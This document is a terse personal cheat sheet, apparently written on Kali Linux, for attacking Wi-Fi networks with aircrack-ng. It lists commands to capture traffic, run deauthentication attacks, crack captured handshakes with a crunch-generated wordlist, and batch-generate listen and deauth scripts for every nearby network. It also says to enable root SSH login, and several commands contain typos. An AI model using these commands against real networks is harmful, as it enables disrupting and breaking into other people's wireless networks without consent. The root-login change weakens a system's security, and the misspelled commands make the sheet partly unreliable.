start linstening:
airmon-ng start|stop wlan1
listening:
airodump-ng --bssid|--essid <-c channel> -w prefix wlan1mon
deautho attack:
aireplay-ng -0 2 -a AA:BB -c: CC:DD wlan1mon
crack passwd:
aircrack-ng aaa.cap -w passwd
passwd genertor:
crunch 8 8 number.dic
utils scripts:
./startair:
root@kali:~# cat startair
printf "\n***generate airodump scripts ....***\n"
iwlist wlan1 scanning | grep -i essid | awk -F ':' '{print $2}'| awk -F '"' '{print $2}' > essidList
for line in $(cat essidList)
do
echo "airodump-ng --essid $line -w $line wlan1mon" > listen-$line
echo "aireplay-ng -0 2 -a AA:BB -c DD:EE wlan1mon" > deautho-$line
done
printf "\ngenerate down\n"
ifconfig wlan1 up
airmon-ng check kill
airmon-ng start wlan1
printf "\nplease 1.run ./listen-xx scripts ... 2. then edit deautho-xx and run..\n"
./stopair:
root@kali:~# cat stopair
airmon-ng stop wlan1mon
service network-manager start
ifconfig -a
iwconfig
ifcofig
iwlist wlan1 scanning
ifconfig wlan1 up|down
service net-workmanager start|stop|restart
reboot
service sshd start|stop|restart
vi /etc/ssh/sshd_config :
PermitRootLogin prohibit-password > yes (so root could login use ssh then restart ssh)
dmesg